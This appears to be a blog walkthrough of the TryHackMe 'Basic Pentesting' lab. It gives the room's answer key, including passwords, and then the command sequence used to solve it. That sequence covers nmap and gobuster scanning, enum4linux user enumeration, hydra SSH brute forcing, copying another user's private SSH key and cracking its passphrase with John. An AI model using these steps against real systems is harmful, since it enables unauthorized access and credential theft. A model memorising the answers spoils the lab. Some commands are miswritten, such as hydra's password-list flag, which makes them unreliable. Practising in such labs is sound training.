Basic Pentesting – TryHackMe
1. What is the name of the hidden directory on the web server(enter name without /)?
Ans: development
2. What is the username?
Ans: jan
3. What is the password?
Ans: armando
4. What service do you use to access the server(answer in abbreviation in all caps)?
Ans: ssh
5. What is the name of the other user you found(all lower case)?
Ans: kay
6. What is the final password you obtain?
Ans: heresareallystrongpasswordthatfollowsthepasswordpolicy$$
===========================
1st Start – Machine Run and openvpn Run
Command (in dir): sudo openvpn file.ovpn
2nd → Run ip address with in browser go to view source code
3rd → use cmd to run
Command: nmap -sC -sV -oN initial IP Address
For find out open port scanning like “22,80,145”
4th → Command: gobuster dir --url http://Ip --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
5th → copy ip/dir to open with browser
6th → cmd: enum4linux -a ip address for find out user name
7th → cmd: hydra -l jan -p /usr/share/wordlists/rockyou.txt ssh://ip
Get Password jan@armando
8th → cmd: ssh jan@ip then put password
9th → cmd: pwd
cmd: cd /
cmd: ls
cmd: cd home
cmd: ls
cmd: cd kay
cmd: ls
cmd: ls -al
cmd: cd .ssh
cmd: ls
cmd: ls -al
cmd: cat id_rsa
10th →cmd: nano id_rsa
cmd: ssh2john id_rsa > hash_key.txt
cmd: john hash_key.txt --wordlist=/usr/share/wordlists/rockyou.txt
Key: beeswax
cmd: ssh jan@id
cmd: ssh -i /home/kay/.ssh/id_rsa kay@id
input key
cmd: ls -al
cmd: cat pass.bak
Comments
Post a Comment